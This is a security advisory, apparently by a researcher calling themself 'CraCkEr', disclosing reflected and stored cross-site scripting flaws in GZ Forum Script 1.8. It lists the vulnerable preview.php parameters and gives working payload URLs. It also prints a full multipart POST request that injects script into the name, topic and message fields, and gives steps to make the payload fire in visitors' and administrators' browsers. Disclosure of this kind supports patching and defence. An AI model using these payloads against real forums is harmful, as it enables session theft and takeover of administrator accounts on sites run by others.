Headline
GZ Forum Script 1.8 Cross Site Scripting
GZ Forum Script version 1.8 suffers from a cross site scripting vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack… ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://gzscripts.com/gz-forum-script.html │
│ Vendor : GZ Scripts │
│ Software : GZ Forum Script 1.8 │
│ Vuln Type: Reflected XSS - Stored XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ Reflected XSS │
│ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim’s │
│ session token or login credentials │
│ │
│ │
│ Stored XSS │
│ │
│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │
│ information, manipulate data, and launch additional attacks. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /preview.php
GET ‘catid’ parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a
Path: /preview.php
GET ‘topicid’ parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2
Stored XSS
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="free_name"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic_message"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325–
POST parameter ‘free_name’ is vulnerable to XSS
POST parameter ‘topic’ is vulnerable to XSS
POST parameter ‘topic_message’ is vulnerable to XSS
Steps to Reproduce:
As a [Guest User] Click on [New Topic] to create a “New Topic” on this Path (http://website/preview.php?controller=Load&action=start_new_topic)
Inject your [XSS Payload] in “Name”
Inject your [XSS Payload] in "Topic Title "
Inject your [XSS Payload] in “Topic Message”
Submit
XSS Fired on Visitor Browser’s when they Visit the Topic you Infect your [XSS Payload] on
XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)
XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
[-] Done